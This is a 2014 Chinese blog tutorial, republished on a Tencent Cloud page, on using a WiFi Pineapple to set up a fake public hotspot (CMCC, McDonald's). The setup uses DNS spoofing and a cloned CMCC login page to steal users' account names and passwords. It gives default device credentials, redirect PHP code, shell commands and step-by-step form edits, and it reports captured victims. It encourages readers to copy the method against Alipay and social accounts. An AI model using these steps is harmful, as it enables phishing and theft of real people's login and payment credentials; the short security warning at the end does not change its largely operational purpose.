前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >玩转WiFi Pineapple之看我如何优雅的盗取CMCC账号

玩转WiFi Pineapple之看我如何优雅的盗取CMCC账号

作者头像
FB客服
发布2018-02-02 16:09:52
2.6K0
发布2018-02-02 16:09:52
举报
文章被收录于专栏:FreeBufFreeBuf

感谢趋势科技的欣姐给我寄了一个Pineapple,于是就自己摸索开始玩了起来,国内pineapple的资料不太多,于是去国外论坛去逛逛,渣渣英语不好看着甚是不舒服,算了自己来鼓捣吧。

准备:

WiFi Pineapple Mark IV 一个

网线一根 PuTTY:远程登录到pineapple的工具 WinSCP:用于拷贝文件到pineapple中

目的:

其他pineapple的玩法论坛早已经有大牛发过文章,有兴趣的童鞋自己去找一下。

今天我给大家分享的是DNS劫持,和利用DNS+克隆登录界面劫持盗取cmcc账号,这只其中的一种玩法,可以同理去克隆一个支付宝登录界面和其他社交账号神马的。

过程:

开始吧,首先配置pineapple:web UI登录地址http://172.16.42.1:1471

用户名:root 密码:pineapplesareyummy

登录后改一下默认密码,不然被人发现反被暴菊就不好玩了,当然默认端口也可以改登录以后我们可以看到pineapple的UI界面我们今天所用到的是services栏目里的DNS Spoof功能,DNSSpoof作为Dsniff工具包的其中一个程序,可以用来作为DNS欺骗之用,使得访问WiFiPineApple的用户可以访问你重新设置DNS,默认是关闭的,点击start打开。

下一步我们配置pineapple,选择上面栏的Configuration 选项,然后修改pineapple的SSID在这里我们因环境而变如果再学校可以改为CMCC,在麦当劳可以改为McDonald's 其他环境可以改为FREEWIFI等。改后点击change SSID 默认是临时的,如果想重启后还可以继续使用的话就选中Persistent选项框。然后到最关键的一步,设置DNS Spoof Config那里将example.com 改为要欺骗的网址,我这里设置百度,因为好多人默认首页就是百度,也可以改为其他。然后Updata Spoofhost,pineapple配置完成。

下一步我们来配置pineapple内的文件,PuTTY连接上pineapple,ip是172.16.42.1,账号密码如果没有改的话就是默认登录那个连接上后首先(一下过程给没有linux基础的童鞋看,大牛略过)

代码语言:javascript
复制
pw
cd ../ls
cd www
vim redirect.php
<?php
$ref = "http://".$_SERVER[&#039;HTTP_HOST&#039;].$_SERVER[&#039;REQUEST_URI&#039;];  
if (strpos($ref, "example")){ 
    header(&#039;Status: 302 Found&#039;);
    header(&#039;Location: example.html&#039;);
}
require(&#039;error.php&#039;);
?>

将example 改为baidu 将example.html改为baidu.html,然后保存退出(不会vim的自己百度一下)

代码语言:javascript
复制
cd ../mkdir web
cd web
touch baidu.html
vim baidu.html

html里的内容就可以自由发挥啦。修改后保存退出,创建一个虚拟连接

代码语言:javascript
复制
cd ../cd www
ln -s /web/* /www/
ls -al

然后就可以开始DNSspoof啦,当别人连接如你伪造的免费wifi热点时,打开百度的效果如下:

下面开始我们的邪恶计划,盗取cmcc账号,其实你只要上面的可以弄对,那么下面的也差不多是一样的。首先用电脑连接cmcc,然后打开浏览器等到跳出登陆界面时,在浏览器中将网页文件保存,保存后得到一个cmcc.html和一个cmcc_file的文件夹其实最主要的是input.html那个文件夹,只要对源码稍加改造就ok啦。我们将cmcc_file文件用WinSCP上传到pineapple的web文件夹中然后按照上面的步骤修改redirect.php 改为input.html ,之后我们对input.html进行改造,找到关键的地方。

代码语言:javascript
复制
<FORM name="staticlogin" id="staticloginid" onsubmit="return checkField(this)" 
      action="error.php" method="post">
      <DIV>
      <DIV class="loginlinput">
      <DIV class="loginlt">用户名</DIV>
      <DIV class="linput"><INPUT name="name" class="linputb" id="staticusernameid" 
      type="text" maxlength="20" value="15111401355"></DIV></DIV>
      <DIV class="loginlinput">
      <DIV class="loginlt">密 码</DIV>
      <DIV class="linput">
          <INPUT name="pass" class="linputb" id="spid" type="text" value="输入固定密码/动态密码">          
          <INPUT name="pass" class="linputb" id="staticpasswordid" style="display: none;" type="password" maxlength="16">
      </DIV>
      <DIV class="lostpassword">
      <!-- <a href="javascript:void(0)" id="lostpassword" onclick="modify_passwd()">忘记密码?</a>-->
      <A id="applyautopwd" onclick="apply_autopwd()" href="javascript:void(0)">获取动态密码</A>
      </DIV>
</DIV>

1.将<FORM name="staticlogin" id="staticloginid" onsubmit="return checkField(this)" action="error.php" method="post">里的action=""改为action="error.php"

2.将用户名下面的<INPUT name="name" class="linputb" id="staticusernameid" type="text" maxlength="20" value="15111401355"> 中的name=""改为name="name"

3.将用户名下面的<INPUT name="pass" class="linputb" id="spid" type="text" value="输入固定密码/动态密码">里的 name=" "改为name="pass"

保存后就可以欺骗了,效果如下:

只要登录以后账号密码就会被记录到/pineapple/logs/phish.log中,当然也可以在web界面上面栏目中的logs中。

才一会就有鱼儿上钩了,其他账号的盗取同理,大家自由发挥吧。

后记:

现在大家部分人对免费的wifi有一一定的警惕性,但是类似于CMCC这种移动的热点大家就会放松警惕,假如我再发挥一下在pineapple载一个3G网卡,就完全可以欺骗你,当你以为连接上了CMCC放心的购物时,你的支付宝密码就在不知不觉中不见鸟,所以别人的wifi慎用就是是CMCC,支付时候最好切换gprs流量吧。

文章中有不准确的地方请给我提出,谢谢给位。

博客地址:www.azone.asia

微博 求互粉 O(∩_∩)O~

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2014-05-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档